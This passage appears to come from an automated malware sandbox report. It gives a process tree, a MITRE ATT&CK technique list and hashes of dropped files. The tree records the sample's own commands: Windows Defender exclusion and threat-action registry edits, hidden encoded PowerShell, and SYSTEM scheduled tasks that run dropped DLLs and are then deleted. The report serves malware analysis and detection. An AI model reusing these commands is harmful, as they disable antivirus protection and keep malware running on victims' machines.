    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VPXvovUKlRyvohVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VPXvovUKlRyvohVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\GTQqDGwYWbPvVFKR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\GTQqDGwYWbPvVFKR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gcEthXdoI" /SC once /ST 04:34:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gcEthXdoI"
  2⤵
  PID:6356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gcEthXdoI"
  2⤵
  PID:4600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sVfKXSxRUTGMojFRQ" /SC once /ST 09:42:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\yBVNUOU.exe\" SY /XWqvdidkI 525403 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "sVfKXSxRUTGMojFRQ"
  2⤵
  PID:2172
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1072
  2⤵
  - Program crash
  PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:7428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5228
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:7732

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5988

C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\yBVNUOU.exe
C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\yBVNUOU.exe SY /XWqvdidkI 525403 /S
1⤵
PID:6660
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5320
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5840
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4468
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5336
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5504
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6192
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:6312
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6380
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6868
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:7056
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5476
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6100
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    PID:4752
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4760
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6612
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:7364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bVxDcMagaMCWGEtnSM"
  2⤵
  PID:7372
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:7964
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    - Indirect Command Execution
    PID:5376
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:7556
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7840
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\fkrzaJYfU\GcegmJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkdMMdcQOSgrkCH" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rkdMMdcQOSgrkCH2" /F /xml "C:\Program Files (x86)\fkrzaJYfU\UrwjQYz.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7660
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "rkdMMdcQOSgrkCH"
  2⤵
  PID:7184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "rkdMMdcQOSgrkCH"
  2⤵
  PID:6176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qEuMReANSKeOhW" /F /xml "C:\Program Files (x86)\eSZVwhDuipfU2\LTEZdhz.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rDcBhYxsizQNm2" /F /xml "C:\ProgramData\VPXvovUKlRyvohVB\WnLClmD.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "vySwpAphEGJzcJQeJ2" /F /xml "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\fbZrnHC.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "isPWwNKyFiUyNQihUoJ2" /F /xml "C:\Program Files (x86)\ksrpDeExrbNyC\KVnfYsF.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "orYTGZZdvmLRzxgHX" /SC once /ST 03:02:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\HxKTayYl\enmBhtO.dll\",#1 /lVRdidd 525403" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "orYTGZZdvmLRzxgHX"
  2⤵
  PID:6368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "sVfKXSxRUTGMojFRQ"
  2⤵
  PID:7732
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 2580
  2⤵
  - Program crash
  PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7484 -ip 7484
1⤵
PID:7932

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\HxKTayYl\enmBhtO.dll",#1 /lVRdidd 525403
1⤵
PID:7164
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\HxKTayYl\enmBhtO.dll",#1 /lVRdidd 525403
  2⤵
  PID:7588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "orYTGZZdvmLRzxgHX"
    3⤵
    PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 936 -ip 936
1⤵
PID:8044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6660 -ip 6660
1⤵
PID:2508

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:8156

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:7292

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:8112

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:6780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indirect Command Execution

T1202

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
01518cc1865c03f48274c76a68434e1a

SHA1
6e7df714d1f7053c4f1e7b8e58972993b810967b

SHA256
7d68299ea07c76053d329cf625b6d7e32f6caaa762a74a9e5277af400e98fae6

SHA512
b7d7f7e0c777afbb9e1b7649ac17acdd20e6305a4aad054a0ddaed729bf65c349e4e27103d24101b7a6e6f339ae1c1790d61b051d3025f763f99ff3dd61008af

Download Submit
C:\ProgramData\AFIIEBGCAA.exe

Filesize
4.7MB

MD5
cd2670554d158aadff36a84cd133a841

SHA1
b2087461f6c10af0503150850e84a8dc309afc48

SHA256
54b7c4e56ab1efc940f22df09a6afc597dc3216b3aa2d597e32e9e26c9af6131

SHA512
034f4d339f2c6509bf74147ec072552d4e3169cc3ed9dccbb666b0468c7d9e9e95a053b999c6f802a71f3ae529d6f177d6e76e88384a082a346c3e022a08266a

Download Submit
C:\ProgramData\AKJKFBAFID.exe

Filesize
4.7MB

MD5
502ee0741d889207e462d29a9e1b0d23

SHA1
84f97522803326316f13fda1323422a95177a860

SHA256
4022245ab5c4db63803c3aecca8df306498a1c947c0c467c2b4ce5e80fb8db8c

SHA512
20db01beacf8d8542c9afdd02e30ba7597cc85a3c43218457f9435a627d9eec40fc6ed3a9de6fa0e94456316775d7e29b4bdd26135c6ed3b0804dfa364c2de79

Download Submit
C:\ProgramData\BAAFBFBAAKEC\KKJEBA

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\ProgramData\BNode Cell Tree 8.1.66\BNode Cell Tree 8.1.66.exe

Filesize
4.1MB

MD5
0271740feb9574fd55ae5d9242e52bcb

SHA1
d833f80999873e79e0d18b75d92466b269472a15

SHA256
e414211ee980beaf1bf4f966ecfd5d58c161b43fd073859cae3e101f028bff79

SHA512
396ddf1e3364ad3f67409f99c9276f552002de01be4739557f8ac1e6e253458007334bcc6bdf51d0e22c502d60959dfefb01cfb300d12e5a9dbf6dfdc2889320

Download Submit
C:\ProgramData\DHJEBGIEBFIJ\IDGIJE

Filesize
116KB

MD5
4e2922249bf476fb3067795f2fa5e794

SHA1
d2db6b2759d9e650ae031eb62247d457ccaa57d2

SHA256
c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1

SHA512
8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

Download Submit
C:\ProgramData\DHJEBGIEBFIJ\IIEHCF

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\ProgramData\DHJEBGIEBFIJ\JJJJDA

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\1000029002\569a0e2a6b.exe

Filesize
273KB

MD5
f10d9e7ad6c6bc87f96a796a36d5c36f

SHA1
7fbe22e16787464766f3119a3e21a77b6f73c2a3

SHA256
22bfc2fcbca23aa128ce2e43580850b4dcfd249a0a3bc283a087a77ab8965f14

SHA512
2e30174b055ffcf506c9d68fac202c57ba536e79ea905f4ac998325685525c638a21ae2885805d07a93b64926111dad0b5589866493df752266bfca1f696d881

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
d19779dad22d261af8f63fc75202d65a

SHA1
fa53d45206d19934e4bcb9c26e19ec8970c41867

SHA256
adaa38369456621e3dc7c6ac15c30379d6629c8abdee31d4e0681ff1025db3b6

SHA512
6325670363dfe0bcc1569538da67b6f5cecb5af55ebf51aa060fb54a1335b3ccb80f220fb1d97e7b08b73c360ac58cf791aac4ec5d6d114aa25a97289365184e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e35616ead296dfc20451e3f2ef0f1a6a

SHA1
cf5d4de230b9631f31e311ed196483af8d39f70b

SHA256
79e0d13391c5a17de396de145490cf013b2d21b35bbd02cbedff4f9c069fb0cc

SHA512
3395980a57ae64d74354c8fb86f6d373ee7ff00fbb6692ce1a0d2f108c3e8ed55e8eefbc986dff90fee28d808fe8ad47428c837a30ce38e6fc70c6743a63a911

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3b955e722604701611f125fb68f961ac

SHA1
cd0229bdf7a707e61b68c076be78554e293be793

SHA256
cf96dc0a7769526dd103f80138f017ddd6dc6a30d1160e46085a59cab5ced215

SHA512
